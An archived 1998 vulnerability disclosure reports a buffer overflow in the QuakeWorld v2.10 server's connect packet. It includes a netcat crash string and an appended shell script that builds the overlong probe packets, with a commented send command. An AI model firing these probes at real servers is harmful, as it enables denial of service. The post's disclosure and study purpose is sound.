QW vulnerability
Glenn F. Maynard (glennm MEDIAONE.NET)
Tue, 7 Apr 1998 19:42:09 -0400
On the same note, QuakeWorld v2.10 (latest) is overflowable in the initial "connect" sequence. The first client->server packet gives the user name, colors, etc: 0xFF,0xFF,0xFF,0xFF followed by (plaintext)

    -> connect "\name\Glenn\key\data"

There is no bounds checking on this connect; netcatting the following will crash the server (although segfault appears trapped; no message is displayed, and no core is left):

    '    connect "\x\xxxxxxxxxxxxxxxxxx'

(repeat "x" as needed; replace the first 4 spaces with 0xFF).

I've done no actual testing on the buffer length, and my assembler skills are not enough to give an example exploit.

FTR, I've mailed Zoid (current maintainer of QW) multiple times about this (and told him once on IRC); not once have I received a reply.

- Glenn F. Maynard
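The packet framing described in the message (four 0xFF bytes, then the plaintext "connect" command with a backslash-separated userinfo string), as an added shell example that is not part of the original post and not QuakeWorld's own code. It only builds the bytes on stdout so the framing can be inspected offline; the host, the port (27500, assumed here as the QuakeWorld default) and the probe length are assumptions, and, as the post itself says, the real buffer length was never measured.

```shell
#!/bin/sh
# Added example: emit QuakeWorld-style out-of-band "connect" packets on stdout.
# Framing per the message above: 0xFF 0xFF 0xFF 0xFF followed by plaintext.

# Print the 4-byte out-of-band marker followed by the given plaintext command.
# $1 = plaintext command, e.g. 'connect "\name\Glenn\key\data"'
qw_oob_packet() {
    printf '\377\377\377\377%s' "$1"
}

# Build the normal connect packet: the userinfo string is "\key\value" pairs.
# $1 = player name, $2 = value for the "key" field (field names from the post)
qw_connect_packet() {
    qw_oob_packet "connect \"\\name\\$1\\key\\$2\""
}

# Build the probe from the message: the value of the "x" key repeated N times,
# with no closing quote, exactly as the post writes it. N is a parameter here
# because the post gives no measured buffer length.
# $1 = number of 'x' characters
qw_probe_packet() {
    n=$1
    xs=''
    i=0
    while [ "$i" -lt "$n" ]; do
        xs="${xs}x"
        i=$((i + 1))
    done
    qw_oob_packet "connect \"\\x\\$xs"
}

# Byte count of a packet produced by the given builder: 4 marker bytes + text.
# Usage: qw_packet_len qw_connect_packet Glenn data
qw_packet_len() {
    "$@" | wc -c | tr -d ' '
}

# Hex of the first four bytes, to confirm the 0xFF marker survived the shell.
qw_oob_marker_hex() {
    "$@" | od -An -tx1 -N4 | tr -d ' \n'
}

# To actually send a packet over UDP to a server you own (assumed address):
#   qw_connect_packet Glenn data | nc -u 127.0.0.1 27500
```

The `-u` flag is the UDP switch on most netcat builds; check yours, since some variants also need a timeout option to return. The builders print the bytes only, so they can be piped into `od -c` to verify the marker and the backslashes before anything is sent.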